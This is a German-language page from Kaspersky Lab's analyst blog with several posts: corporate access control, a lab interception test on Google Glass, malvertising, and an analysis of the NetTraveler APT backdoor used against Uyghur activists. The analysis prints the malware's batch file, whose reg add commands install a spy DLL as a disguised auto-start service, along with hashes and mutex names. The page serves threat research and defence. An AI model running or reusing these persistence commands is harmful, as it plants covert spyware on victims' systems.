Alle Bedrohungen

Viren

Hacker

Spam

Alle Seiten    Viren
  
Virus Enzyklopädie
Alarme
Analysen
Nachrichten
Glossar
Weblog

 
Kalender

<< 2014  
Jan Feb Mär
Apr Mai Jun
Jul Aug Sep
Okt    
Über die Autoren des Tagebuches
Über die Autoren des Tagebuches

Das Analytiker-Tagebuch ist ein weblog, das von den Analytikern des Kaspersky Lab unter der Leitung von Eugene Kaspersky unterhalten wird. Erfahren Sie mehr über die Autoren des weblog.

Cybercrime Umfrage

Sobald Sie Ihren PC mit dem Internet verbinden, wird er zu einem potenziellen Ziel für Cyberkriminelle. Genauso wie Einbrecher bei einem ungesicherten Haus leichtes Spiel haben, ist ein ungeschützter PC wie eine offene Einladung an Autoren von Malware. Cyberbedrohungen werden nicht nur immer raffinierter, sondern nehmen auch ständig zu: Unser Antiviruslabor verzeichnet derzeit über 17.000 neue Internetbedrohungen pro Tag.

Zur Umfrage

 

  Home / Weblog

Analytiker-Tagebuch

Löcher im Schutz von Unternehmensnetzwerken: Zugriffskontrolle


  Kirill Kruglov        30 September 2014 | 18:49  MSK

Ihr Kommentar  

Die Gewährleistung der reibungslosen Funktion von kritisch wichtigen Systemen sowie die Minderung des Risikos von Angriffen auf das Unternehmensnetzwerk – das sind die vorrangigen Aufgaben der Abteilung für IT-Sicherheit fast jedes beliebigen Unternehmens. Eine der effektivsten Strategien zur Erfüllung dieser Aufgaben ist die Einschränkung der Befugnisse der Systemanwender.

Aus Sicht der IT-Sicherheit haben kritische Systeme zwei grundlegende Eigenschaften – Ganzheitlichkeit und Zugänglichkeit – von denen das reibungslose Funktionieren dieser Systeme abhängt. Für den Schutz eines Unternehmensnetzwerks vor Attacken muss unbedingt die „Angriffsoberfläche“ (attack surface) verringert werden, indem die Zahl der Geräte und Netzdienste reduziert wird, auf die von außerhalb des Unternehmensnetzwerks zugegriffen werden kann, und indem der Schutz solcher Systeme und Dienste gewährleistet wird, die einen solchen Zugriff benötigen (Web-Services, Gateways, Router, Workstations usw.). Insbesondere Anwendercomputer mit Internetzugang sind ein wichtiger Angriffsvektor auf das Unternehmensnetzwerk.

Um kritische Systeme vor nicht sanktionierten Veränderungen zu schützen und die Möglichkeiten von Angriffen auf ein Unternehmensnetzwerk zu reduzieren, müssen unbedingt die folgenden Maßnahmen ergriffen werden:

  • Festlegen, welche Objekte (Equipment, Systeme, Geschäftsanwendungen, wertvolle Dokumente usw.) im Unternehmensnetzwerk geschützt werden müssen;
  • die Geschäftsprozesse des Unternehmens beschreiben und in Übereinstimmung mit ihnen das Zugriffslevel auf die zu schützenden Objekte definieren;
  • sicherstellen, dass jedem Subjekt (Anwender oder Unternehmensanwendung) ein eindeutiger Account zugeordnet ist;
  • den Zugriff der Subjekte auf die Objekte soweit es geht beschränken, d.h. die Rechte der Subjekte im Rahmen der Geschäftsprozesse einschränken;
  • sicherstellen, dass alle Operationen der Subjekte an den Objekten protokolliert und die Protokolle an sicheren Orten gespeichert werden.

In der Praxis sieht es in einem Unternehmensnetzwerk ungefähr folgendermaßen aus:

  • Alle Unternehmensdokumente werden zentralisiert gespeichert, in allgemeinen Ordnern auf einem der Unternehmensserver (beispielsweise auf einem Server in der Rolle eines Document Controllers).
  • Der Zugriff auf kritische Systeme ist allen verboten, außer den Administratoren – jeder beliebige Admin kann im Falle eines Absturzes aus der Ferne auf das System zugreifen, um alles schnell zu reparieren.
  • Manchmal verwenden die Administratoren einen „gemeinsamen“ Account.
  • Die Accounts aller normalen Mitarbeiter verfügen über die überaus eingeschränkten Rechte eine „gewöhnlichen Anwenders“, doch auf den ersten Wunsch hin kann ein jeder die Rechte eines lokalen Administrators erhalten.

Technisch ist es um Einiges einfacher, kritische Systeme zu schützen als Workstations, da es selten zu Veränderungen der Geschäftsprozesse kommt, die Regelung bezüglich ihres Einsatzes sich kaum ändert und daher auch das kleinste Detail berücksichtigt werden kann. Im Gegensatz dazu ist die Arbeitsumgebung der Anwender chaotisch, die Prozesse ändern sich stetig und zusammen mit ihnen ändern sich die Anforderungen an die Gewährleistung des Schutzes. Zudem stehen viele Anwender jeglichen Einschränkungen skeptisch, wenn nicht gar negativ gegenüber, selbst wenn sie ihre Arbeitsprozesse gar nicht berühren. Daher ist der traditionelle Schutz des Anwenders nach dem Motto aufgebaut: „Lieber Malware durchlassen, als irgendetwas Notwendiges blockieren.“

Im vergangenen Jahr hat das Unternehmen Avecto eine Untersuchung bekannter Sicherheitslücken in der Software von Microsoft durchgeführt und ist zu dem Schluss gekommen, dass „Der Verzicht auf die Nutzung der Rechte eines lokalen Administrators es ermöglicht, die Risiken der Ausnutzung von 92% der kritischen Sicherheitslücken in der Software von Microsoft zu verringern“. Diese Schlussfolgerung erscheint völlig logisch, doch man muss dazu sagen, dass das Unternehmen Avecto keine reale Untersuchung der Sicherheitslücken durchgeführt, sondern lediglich die Daten aus dem Microsoft Vulnerability Bulletin 2013 analysiert hat. Trotzdem liegt es auf der Hand, dass Schadsoftware, die ohne Administratorenrechte gestartet wurde, keine Driver installieren kann, keine Dateien in den Verzeichnissen %systemdrive%, %windir%, %programfiles% usw. erstellen/modifizieren kann, die Konfiguration des Systems nicht verändern kann (insbesondere nicht in den Hauptschlüssel der Registry, HKLM, schreiben), und – was am Wichtigsten ist – keine privilegierten API-Funktionen nutzen kann.

Doch in Wahrheit sind fehlende Administratorenrechte kein wirklich ernsthaftes Hindernis – weder für Schadprogramme noch für Hacker, die in ein Unternehmensnetzwerk eindringen wollen. Erstens finden sich in jedem beliebigen System Dutzende Sicherheitslücken, mit Hilfe derer man sich die notwendigen Rechte verschaffen kann – bis hin zu Privilegien auf Kernel-Ebene. Zweitens existieren auch Bedrohungen, die sich schon mit den Rechten eines gewöhnlichen Anwenders realisieren lassen. Auf dem unten stehenden Schema sind mögliche Angriffsvektoren dargestellt, für deren Umsetzung keine Administratorenrechte erforderlich sind – und genau um diese geht es hier.

Lokale Attacken

Allein mit den Standardrechten eines gewöhnlichen Benutzers ausgestattet, erhält ein Cyberkrimineller vollständigen Zugriff auf die Speicher aller Prozesse, die unter dem Account des Anwenders laufen. Das ist vollkommen ausreichend, um schädlichen Code in die Prozesse einzuschleusen, mit dessen Hilfe das System entfernt gesteuert (Backdoor), die Tastatureingaben abgefangen (Keylogger) und der Content im Browser modifiziert werden kann. Und so weiter.

Da die meisten Antiviren-Programme den Versuch der Einschleusung von unbekanntem Code in die Prozesse blockieren, greifen Cyberverbrecher häufig auf verdeckte Methoden zurück. Ein alternativer Ansatz ist zum Beispiel die Einschleusung einer Backdoor oder eines Keylogger in den Prozess des Browsers – unter Verwendung von Plug-Ins und Erweiterungen. Für den Download eines Plug-Ins sind die Rechte eines gewöhnlichen Benutzers völlig ausreichend, dabei kann der Code des Plug-Ins fast genau das Gleiche machen, was auch ein vollwertiger trojanischer Code tun kann – d.h. entfernt den Browser steuern, die eingegebenen Daten und den Traffic im Browser protokollieren und mit Webservices interagieren und den Inhalt von Seiten modifizieren (Phishing).

Nicht weniger interessant für Cyberkriminelle sind die gewöhnlichen Office-Anwendungen (beispielsweise E-Mail- und IM-Clients), die für Angriffe auf andere Anwender im Netz (unter anderem Phishing und Social Engineering) benutzt werden können. Ein Online-Verbrecher kann sich Zugriff auf Programme wie Outlook, The Bat, Lync, Skype usw. verschaffen, und zwar nicht nur, indem er Code in die entsprechenden Prozesse einschleust, sondern auch über die Programmierschnittstelle und die lokalen Dienste dieser Anwendungen.

Es ist klar, dass nicht nur die Anwendungen, sondern auch die auf dem PC gespeicherten Daten für Cyberkriminelle einen großen Wert darstellen können. Neben Unternehmensdokumenten suchen Kriminelle oft nach Dateien verschiedener Anwendungen, die Passwörter, verschlüsselte Daten, digitale Schlüssel (SSH, PGP und andere) und vieles mehr enthalten. Befindet sich auf dem Computer eines Anwenders Quellcode, so können Cybergangster versuchen, ihren schädlichen Code dort einzuschleusen.

Domain-Attacken

Da die Konten der meisten Unternehmensanwender Domain-Accounts sind, ermöglicht der Mechanismus der Domain-Autorisierung (Windows Authentication) dem Anwender den Zugriff auf unterschiedliche Netzdienste im Unternehmensnetzwerk. Häufig wird der Zugriff automatisch bereitgestellt, ohne zusätzliche Abfrage der Login-Daten und des Passworts. Wenn ein infizierter Anwender also Zugriffsrechte auf irgendeine Unternehmensdatenbank besitzt, so kann ein Cyberkrimineller sie ebenfalls problemlos nutzen.

Mit Hilfe der Domain-Autorisierung haben Cyberkriminelle auch Zugriff auf alle Netzwerkordner und –Festplatten, die für den Anwender verfügbar sind, auf interne Internet-Ressourcen und manchmal auch auf andere Workstations im selben Segment des Netzwerks.

Neben Netzwerkordnern und Datenbanken finden sich in einem Unternehmensnetzwerk nicht selten verschiedene Netzdienste, wie z.B. Remote-Zugriff, FTP, SSH, TFS, GIT, SVN usw. Selbst wenn für den Zugriff auf diese Dienste separate Accounts (also keine Domain-Konten) verwendet werden, kann ein Online-Verbrecher sie problemlos im Arbeitsprozess des Anwenders nutzen (d.h. während einer aktiven Sitzung).

Schutz

Es ist praktisch unmöglich, ein hohes Sicherheitsniveau auf Workstations zu gewährleisten, nur indem den Anwendern die Administratorenrechte entzogen werden. Auch die Installation von Antiviren-Software auf einer Workstation erhöht vielleicht den Schutz, löst aber nicht alle Probleme. Zum Erreichen eines hohen Sicherheitsniveaus kann die Technologie Application Control („Anwendungskontrolle“) beitragen, die aus drei Schlüsselelementen besteht:

  1. Im Modus ‚Default Deny’ (standardmäßig verboten) wird nur solche Software installiert und ausgeführt, die vom Administrator zugelassen wurde. Dabei muss der Administrator keineswegs jede einzelne Anwendung in die Weiße Liste aufnehmen (Hash). Ihm steht eine Vielzahl von generischen Tools zur Verfügung, die es ermöglichen, der Liste der erlaubten Software dynamisch alle Programme hinzuzufügen, die mit dem einen oder anderen Zertifikat signiert sind, von bestimmten Herstellern entwickelt wurden, aus vertrauenswürdigen Quellen stammen oder in der Whitelisting-Datenbank eines Produzenten von Sicherheitslösungen enthalten sind.
  2. Der Modus ‚Kontrolle vertrauenswürdiger Anwendungen‘ macht es möglich, die Arbeit der zugelassenen Software auf die Funktionen zu beschränken, die diese Software auch tatsächlich ausführen soll. Für seine normale Funktionsweise sollte ein Browser beispielsweise die Möglichkeit haben, Netzverbindungen herzustellen, doch dabei ist es keineswegs notwendig, dass der Browser den Speicher anderer Prozesse ausliest bzw. hineinschreibt, sich mit Netz-Datenbanken verbindet oder Dateien in Internetressourcen speichert.
  3. Die Kontrolle der Update-Installation ermöglicht die reibungslose Aktualisierung von Software auf Workstations (im Modus ‚Default Deny‘), während gleichzeitig das Risiko einer Systeminfektion durch Update-Mechanismen gemindert wird.

Neben dem oben Aufgeführten stellen konkrete Produkte mit integrierter Application Control auch verschiedene andere nützliche Funktionen auf der Grundlage dieser Technologie bereit. Insbesondere sind das die Inventarisierung, die Kontrolle der im Netzwerk installierten Software, das Zusammenstellen von Ereignisberichten (die bei der Untersuchung von Sicherheitsvorfällen hilfreich sein können) usw.

Die Kombination der Technologien ermöglicht es einerseits, dem Nutzer all das an die Hand zu geben, was er für seine Arbeit und selbst zu Unterhaltungszwecken braucht. Und selbst wenn er morgen noch irgendetwas anderes benötigt, so kann er sich dieses „Irgendetwas“ ohne Probleme besorgen. Gleichzeitig aber sind die Möglichkeiten eines Cyberkriminellen, der sich Zugriff auf ein geschütztes System verschaffen konnte, überaus eingeschränkt. Zweifellos ist das die ideale Balance zwischen Flexibilität und Sicherheit beim Schutz von Unternehmensnetzwerken.

Wie Cyberkriminelle die Welt durch Ihre Augen sehen


  Roberto Martinez       10 September 2014 | 17:03  MSK

Ihr Kommentar  

Technologie hat unser Leben verändert, unsere Art zu leben, unsere Art zu arbeiten. Durch das Aufkommen von „Wearable Computern“, tragbaren Computersystemen also, die während der Anwendung am Körper des Nutzers befestigt sind, erscheint den Menschen die Verschmelzung der virtuellen mit der physikalischen Welt immer selbstverständlicher, denn sie nutzen diese Technologie nun ununterbrochen. Google Glass ist eins der erstaunlichsten tragbaren Geräte, und obgleich es sich noch in einem frühen Entwicklungsstadium befindet, lässt sich nicht leugnen, dass man tolle Sachen damit anstellen und die Welt mit dem Gerät auf eine andere Art und Weise erfahren kann.

google_glass_1

Mit der Out-the-Box-Funktionalität kann man das Internet durchsuchen, Fotos oder Videos aufnehmen, E-Mails checken, Nachrichten senden oder Informationen auf Google+ veröffentlichen. Was uns wirklich fasziniert, sind die denkbaren Einsätze solcher Geräte in Bereichen wie Medizin und Bildung. Das Gerät könnte für Chirurgen unentbehrlich werden, um die vitalen Funktionen von Patienten zu kontrollieren oder Operationen live per Video an andere Spezialisten zu senden. Ebenso sind neue Möglichkeiten vorstellbar, Studenten Wissen interaktiv zu vermitteln. Möglicherweise sind sogar Verbesserungen in der Strafverfolgung möglich, beispielsweise durch eine sofortige Identifizierung von gesuchten Verbrechern.

google_glass_2


google_glass_3

Leider gehen mit neuen Technologien auch immer neue Sicherheitsrisiken einher. Es gibt tatsächlich viele Bedenken wegen der potentiellen Datenschutz-Risiken und der Art, wie diese neuen Geräte kompromittiert werden könnten. Cyberkriminelle liegen nicht auf der faulen Haut und suchen ständig nach neuen Wegen, sich an ihren Opfern zu bereichern – wann immer sich ihnen eine solche Möglichkeit bietet, arbeiten sie Tag und Nacht daran, ihr Ziel zu erreichen.

Neue Technologien, alte Risiken.

google_glass_4

Neue und bereits bekannte Geräte haben vieles gemeinsam: Sie verwenden dieselben Protokolle und sind mit anderen Geräten, die ähnliche Apps verwenden, vernetzt. Daran geht kein Weg vorbei. Traditionelle Angriffsvektoren sind meist auf die Netzwerkebene ausgerichtet, in Form von Man-in-The-Middle-Attacken (MiTM), auf die Ausnutzung von einigen Sicherheitslücken im Betriebssystem oder in den Anwendungen selbst. Da Glass auf Android basiert, könnte es bekannte Sicherheitslücken enthalten, die in anderen Geräten mit demselben Betriebssystem gefunden wurden.

Es gibt zwei Arten, mit Google Glass im Internet zu surfen: Via Bluetooth in Kombination mit einem mobilen Gerät, das seine Netzwerkverbindung teilt, oder direkt über Wi-Fi mit vorheriger Konfiguration des Netzwerks über den MyGlass-Account oder einen von einer mobilen App generierten QR-Code.

google_glass_5


google_glass_6



Das Hinzufügen eines Netzwerks ist überaus simpel: Durch das Eintragen eines Netzwerknamens und eines Passworts wird ein QR-Code generiert, der die Verbindungseinstellungen enthält, die dann – wenn durch Glass darauf geschaut wird – eine automatische Verbindung zum Netzwerk herstellen.

google_glass_7



Letztes Jahr wurde von dem Sicherheitsunternehmen Lookout eine Sicherheitslücke im Zusammenhang mit dieser Prozedur veröffentlicht, die dazu führen könnte, dass der Nutzer dazu gebracht wird, sich über einen schädlichen QR-Code mit einem gefälschten Zugriffspunkt zu verbinden. Potentielle Angreifer hätten damit die Möglichkeit, die Netzwerkkommunikation abzufangen und die Navigation zu einer schädlichen Webseite umzuleiten, die eine bekannte Android-Web-Sicherheitslücke ausnutzen könnte. Diese Sicherheitslücke wurde gepatcht, doch sie hat uns deutlich vor Augen geführt, dass Angreifer durchaus in der Lage sind, Wege aufzutun, diese neuen Geräte zu kompromittieren.

Eine potentiell Risikoquelle besteht darin, dass das Glass-Interface – anders als es bei Computern oder mobilen Geräten der Fall ist - über ‘Cards’ navigiert wird, um durch die verschiedenen Anwendungen und Einstellungen zu scrollen, wodurch die Konfigurationsoptionen eingeschränkt werden und in manchen Fällen bestimmte Prozeduren und Funktionen mit nur geringem Input seitens des Users automatisiert werden, wie z.B. beim Verbinden mit einem Netzwerk oder beim Teilen von Informationen. Diese Automatisierung öffnet der Ausnutzung durch Angreifer und der Kompromittierung privater Anwenderdaten Tor und Tür.

Ein weiteres Einfallstor für Cyberbedrohungen ist die Neigung der User, den 'Debug Mode’ zu aktivieren, um auch Anwendungen außerhalb des offiziellen Glassware-Ökosystems zu installieren, wobei allerdings auch das Risiko steigt, schädliche Anwendungen zu installieren.

Dadurch wird auch die Möglichkeit eröffnet, neue Angriffe unter Verwendung alter Methoden durchzuführen, wie etwa Social Engineering – mit Hilfe der magischen Wörter „kostenlos“ und „Sex“. Obgleich nicht alle Apps, die auf diese Art beworben werden, schädlich sind, sind diese Begriffe Magneten für Anwender, die auf der Suche nach neuen Erfahrungen bereit sind, den vom Hersteller vorbereiteten komfortablen Bereich zu verlassen.

google_glass_8



Ein einfacher Test

Wie bereits oben erwähnt, unterscheidet sich Glass insbesondere dadurch von anderen „Wearables“, dass es möglich ist, sich direkt über eine Wi-Fi-Verbindung im Internet zu bewegen, ohne ein mobiles Gerät „huckepack“ haben zu müssen, von dem man abhängig ist. Trotzdem bedeutet diese Fähigkeit auch, dass das Gerät potentiell Angriffen über das Netzwerk ausgesetzt ist, insbesondere MiTM.

Stellen Sie sich einmal vor, Sie sitzen in Ihrem Lieblingscafé und möchten sich mit Glass mit dem Wi-Fi-Netz verbinden. Sie stellen das Netzwerk ein und sind schon unterwegs – Sie checken sich bei Foursquare ein, starten eine App, um den Song, der im Hintergrund gespielt wird zu identifizieren und den dazugehörigen Songtext abzurufen. Doch was ist, wenn jemand in dem Netzwerk ein Tool verwendet, um die anderen Geräte dazu zu bringen den Traffic zu einer IP-Adresse umzuleiten und so den gesamten Netzwerk-Traffic zu kapern?

Wir haben genau diese Situation in einem kontrollierten Labor-Netzwerk simuliert. Sobald das Netzwerk kompromittiert war, haben wir bei Google einige Suchanfragen gestellt, sind auf einige harmlose Seiten gesurft, haben Bilder und Mitteilungen an ein paar unserer Kontakte verschickt und sogar die neusten Nachrichten gelesen.

google_glass_9



Sobald wir ausreichend Traffic für eine Analyse abgefangen hatten, fanden wir heraus, dass fast der gesamte Traffic auch nach der Kompromittierung des Netzwerks verschlüsselt blieb, insbesondere die Google-Suchen. Wir fanden allerdings genügend Informationen in Klartext, um die Bewegung des Users zu Fluggesellschaften, Hotels und Touristenzielen nachzuvollziehen und zu rekonstruieren. Wir konnten zudem bestimmen, wie und wo das Gerät verbunden war. Keine allzu sensitiven Daten, die allerdings nützlich sein könnten, wenn es darum geht, ein Nutzer-Profil zu erstellen.

Letztlich muss man sich die Sicherheit – wie bei anderen Geräten auch – in Ebenen vorstellen, und wir müssen jede Ebene schützen, um das Risiko einer Kompromittierung zu verringern. In diesem Fall könnte die Netzwerk-Ebene ausgenutzt werden, da sich das Gerät mit öffentlichen Netzwerken verbinden kann, aber nicht über die Option für VPN-Verbindungen verfügt, so dass Traffic abgefangen und analysiert werden kann.

In den kommenden Monaten werden wir feststellen müssen, dass am Körper tragbare Geräte zum neuen Angriffsziel werden. Das heißt, wir müssen diesen Geräten unsere besondere Aufmerksamkeit zuteilwerden lassen, ebenso wie ihren Möglichkeiten und den Informationen, die sie verarbeiten.

Folgen Sie mir auf Twitter @r0bertmart1nez

Lücken im Schutz von Unternehmensnetzwerken: Werbenetze


  Kirill Kruglov         4 September 2014 | 15:31  MSK

Ihr Kommentar  

Der Begriff „Malvertising“ ist noch relativ neu. Er beschreibt eine Malware-Verbreitungsmethode über Werbenetzwerke, die schon seit langem zu den von Cyberkriminellen gern genutzten Werkzeugen gehören. Innerhalb der letzten vier Jahre wurden hunderte Millionen von Anwendern zu Opfern dieser „Viren“-Werbung, darunter auch die Besucher so großer Medien-Sites wie NY Times, London Stock Exchange, Spotify, USNews, TheOnion, Yahoo! und YouTube. Die schwierige Situation mit den Werbenetzwerken hat den ständigen Ermittlungsausschuss des US-Senats zur Durchführung von Ermittlungen veranlasst, in Folge derer empfohlen wird, die Sicherheitsmaßnahmen zu verschärfen und den Besitzern von Werbeplattformen eine größere Verantwortung zu übertragen.

Kurz vor dem Jahreswechsel 2013/2014 wurden 2,5 Millionen Yahoo-Anwender von Cyberkriminellen angegriffen. Kurz nach diesem Vorfall veröffentlichte das Unternehmen Fox IT eine detaillierte Analyse der Attacke. Bemerkenswert ist, dass ihren Angaben zufolge nicht alle Nutzer von Yahoo! betroffen waren, sondern nur User aus europäischen Ländern, in erster Linie aus Rumänien, England und Frankreich. Die Analysten von Fox IT weisen darauf hin, dass die Cyberkriminellen aller Wahrscheinlichkeit nach Mechanismen der zielgerichteten Werbung nutzten, d.h. sie kauften „Werbeeinblendungen“ für eine bestimmte Zielgruppe aus den oben erwähnten Ländern. Hier eine anschauliche Darstellung von Angriffen über Werbenetzwerke: allgemeines Angriffsschema (links) und ein konkretes Beispiel anhand des Angriffs auf die User von Yahoo! (rechts).


malvertising_1


Wir berichteten bereits über zielgerichtete Angriffe unter Ausnutzung vertrauenswürdiger Websites (Wasserloch-Attacken) und social Engineering in sozialen Netzwerken und IM-Clients. Wir gingen dabei insbesondere darauf ein, dass Cyberkriminelle für die Durchführung einer Wasserlochattacke erstens unbedingt eine vertrauenswürdige Website hacken und zweitens unbemerkt schädliche Skripte auf dieser Site einschleusen müssen. Zur Umsetzung von Angriffen über soziale Netzwerke und IM-Clients müssen Online-Verbrecher ebenfalls eine Reihe von Bedingungen erfüllen und sich zumindest das Vertrauen des Anwenders erschleichen, um die Wahrscheinlichkeit zu erhöhen, dass das Opfer auf einen vom Verbrecher gesendeten Link klickt.

Der grundlegende Unterschied zu Attacken über Werbenetzwerke liegt darin, dass die Cyberkriminellen hier keinerlei Sites hacken und sich auch nicht das Vertrauen ihrer potentiellen Opfer erschleichen müssen. Sie müssen lediglich einen Werbeprovider finden, bei dem man „Werbeeinblendungen“ kaufen kann oder selbst so ein Provider werden (nach Art von BadNews). Die restliche Arbeit zur Verbreitung des Schadcodes übernehmen die Mechanismen des Werbenetzwerks – im Endeffekt lädt die vertrauenswürdige Site selbst die schädlichen Skripte über iframe auf ihre Seiten.

Und auch der Anwender muss nirgendwo klicken – beim Versuch, das Banner auf der Seite der Website anzuzeigen, führt der Browser den SWF/JS-Code des Banners aus, der den User automatisch auf die Site umleitet, die die Startseite eines populären Exploit-Packs enthält, beispielsweise Blackhole. Daraufhin beginnt eine Drive-by-Attacke – das Exploit-Pack versucht, das passende Exploit für einen Angriff auf eine Sicherheitslücke im Browser oder in den dazugehörigen Plug-Ins zu finden.

Das Problem der Werbenetzwerke, die zur Verbreitung von Schadsoftware und zur Umsetzung von zielgerichteten Attacken eingesetzt werden (dank der Möglichkeiten der zielgerichteten Werbung), betrifft nicht nur die Nutzer von Browsern, die die eine oder andere Website besuchen. Dieses Problem betrifft auch die Nutzer von Anwendungen, die über einen Mechanismus zur Darstellung von Werbung verfügen: IM-Clients (insbesondere Skype), E-Mail-Clients (eben auch Yahoo!) usw. Am wichtigsten ist aber – das Problem besteht auch für die Unmenge von Nutzern mobiler Apps, die ebenfalls Werbenetzwerke verwenden!

Der qualitative Unterschied von mobilen Anwendungen besteht darin, dass gewöhnliche SDK zur Integration von Werbung in Anwendungen (wie beispielsweise AdMob, Adwhirl und andere) es nicht erlauben, willkürlichen Code der Werbeprovider auszuführen, wie es im Fall von Werbung auf einer Website möglich ist. Das bedeutet, vom „Werbungs-Lieferserver“ werden nur statische Daten angenommen – Bilder, Links, Einstellungen usw. Doch neben den Medien des Unternehmens entwickeln auch Cyberkriminelle solche SDK, indem sie den Entwicklern einen hohen Preis für jeden Klick im Vergleich zu den legitimen Konkurrenten anbieten. Auf diese Weise schleusen die Entwickler von legitimer mobiler Software selbst den schädlichen Werbe-Code in ihre Anwendungen ein, bei dem es sich tatsächlich um eine Backdoor handelt. Darüber hinaus können in legitimen SDK auch Sicherheitslücken vorhanden sein, die die Ausführung von willkürlichem Code ermöglichen. Ende vergangenen Jahres wurden zwei derartige Vorfälle registriert – mit HomeBase SDK und mit AppLovin SDK.


malvertising_2


Quelle: http://researchcenter.paloaltonetworks.com

Es ist nicht leicht, eine Antwort auf die Frage zu finden: „Wie schützt man das Unternehmensnetzwerk vor Attacken über Werbe-Netzwerke?“, insbesondere wenn man mögliche zielgerichtete Attacken genauer betrachtet. Wie bereits oben erwähnt, müssen nicht nur die Workstations (Browser, IM-Clients, E-Mail-Clients und andere Anwendungen mit integrierter dynamischer Werbung) geschützt werden, sondern auch mobile Geräte, die an das Unternehmensnetzwerk angeschlossen sind.

Es liegt auf der Hand, dass für den Schutz der Workstations mindestens eine Antiviren-Lösung der Klasse Security Suite erforderlich ist, die unbedingt die folgenden Funktionen enthalten muss:


  • Schutz vor Ausnutzung von Sicherheitslücken;

  • ein fortschrittliches HIPS mit Zugriffsbeschränkungsfunktionen sowie mit Funktionen der heuristischen und verhaltensbasierten Analyse (unter anderem ein Traffic-Analyser);

  • Methoden zur Funktionskontrolle des Betriebssystems (System Watcher oder Hypervisor) für den Fall, dass trotz allem Malware in das System eindringen konnte.

Um den Schutz von Workstations noch zuverlässiger zu gestalten, sollten außerdem Technologien zur Anwendungskontrolle eingesetzt werden, und es sollten Statistiken über die im Netz laufende Software zusammengestellt werden (Inventarisierung); es sollten Updatemechanismen konfiguriert und der Modus Default Deny aktiviert werden.

Verglichen mit dem Schutz von Workstations befindet sich der Schutz für mobile Geräte leider erst in der Entwicklungsphase. Es ist äußerst schwierig eine vollwertige Security Suite oder Anwendungskontrolle für mobile Geräte umzusetzen, da zu diesem Zweck die Firmware modifiziert werden muss, was nicht immer möglich ist. Daher ist die effektivste Technologie zum Schutz von an das Unternehmensnetzwerk angeschlossenen Geräten zum gegenwärtigen Zeitpunkt das Mobile Device Management, das bestimmt, welche Anwendungen auf dem Gerät installiert werden können und welche Apps nicht installiert werden sollten.

Cyberkriminelle verwenden schon seit Jahre Werbenetzwerke, um Malware zu verbreiten. Gleichzeitig wächst der Markt der Internet-Werbung stetig, er weitet sich auf neue Plattformen aus (große Portale, populäre Anwendungen, mobile Geräte) und zieht immer mehr Werbekunden, Partner und Vermittler an, die sich in einem außerordentlich verworrenen Netz miteinander verflechten. Das Problem mit den Werbenetzwerken ist ein weiteres Beispiel dafür, dass die rasante Entwicklung von Technologien nicht immer von einer rechtzeitigen Entwicklung der entsprechenden Schutzmechanismen begleitet wird.

Rundum-Erneuerung der NetTraveler APT zum 10-jährigen Jubiläum


  Costin       27 August 2014 | 15:00  MSK

Ihr Kommentar  

Über NetTraveler haben wir bereits HIER und HIER berichtet.

Früher in diesem Jahr beobachteten wir eine Zunahme der Angriffe gegen uigurische und tibetanische Aktivisten und Unterstützer unter Verwendung einer aktualisierten Version der NetTraveler-Backdoor.

Hier ein Beispiel für eine zielgerichtete Spearphishing-E-Mail, die im März 2014 an uigurische Aktivisten gesendet wurde.

nettraveler_1

Die Mail enthält zwei Anhänge – eine nicht schädliche JPG-Datei und eine 373 KB große MS Word .DOC-Datei.

Dateiname"Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc"
MD5b2385963d3afece16bd7478b4cf290ce
Größe381,667 Bytes

Die .DOC-Datei, die in Wahrheit ein “Single File Web Page”-Container ist, auch bekannt als “Web Archive Datei”, scheint auf einem System erstellt worden zu sein, das MS-Office vereinfachtes Chinesisch verwendet.

Sie enthält ein Exploit für die Sicherheitslücke CVE-2012-0158, das von Kaspersky Lab-Produkten als Exploit.MSWord.CVE-2012-0158.db detektiert wird.

Wird dieses Exploit auf einer angreifbaren Version von MS-Office ausgeführt, transportiert es das Hauptmodul “net.exe” (von Kaspersky Lab-Produkten detektiert als Trojan-Dropper.Win32.Agent.lifr) auf das System, welches wiederum eine Reihe von anderen Dateien installiert. Das wichtigste C&C-Modul wird unter “%SystemRoot%\system32\Windowsupdataney.dll” abgelegt, (von Kaspersky als Trojan-Spy.Win32.TravNet.qfr detektiert).

NameWINDOWSUPDATANEY.DLL
MD5c13c79ad874215cfec8d318468e3d116
Größe37,888 Bytes

Es wird durch eine Windows Batch-Datei mit dem Namen “DOT.BAT” (von Kaspersky Lab-Produkten als Trojan.BAT.Tiny.b detektiert) als Service (unter der Bezeichnung “Windowsupdata”) registriert:

@echo off


@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v Windowsupdata /t REG_MULTI_SZ /d Windowsupdata /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ImagePath /t REG_EXPAND_SZ /d %SystemRoot%\System32\svchost.exe -k Windowsupdata /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v DisplayName /t REG_SZ /d Windowsupdata /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ObjectName /t REG_SZ /d LocalSystem /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v ErrorControl /t REG_DWORD /d 1 /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata" /v Start /t REG_DWORD /d 2 /f

@reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windowsupdata\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\Windowsupdataney.dll /f


Um sicher zu gehen, dass die Malware nicht mehrfach ausgeführt wird, verwendet sie den Mutex “SD_2013 Is Running!”, um die Anwesenheit im System zu markieren. In älteren und aktuellen Varianten wurden unter anderem die folgenden Mutexes verwendet:


  • Boat-12 Is Running!

  • DocHunter2012 Is Running!

  • Hunter-2012 Is Running!

  • NT-2012 Is Running!

  • NetTravler Is Running!

  • NetTravler2012 Is Running!

  • SH-2011 Is Running!

  • ShengHai Is Running!

  • SD2013 is Running!

Die Konfigurationsdatei der Malware ist in den “SYSTEM”-Ordner geschrieben (anstatt in den Ordner SYSTEM32) und hat gegenüber den „älteren“ NetTraveler-Samples ein leicht verändertes Format:

nettraveler_2

Für die Akten: So sieht eine ältere Konfigurationsdatei von NetTraveler aus:

nettraveler_3

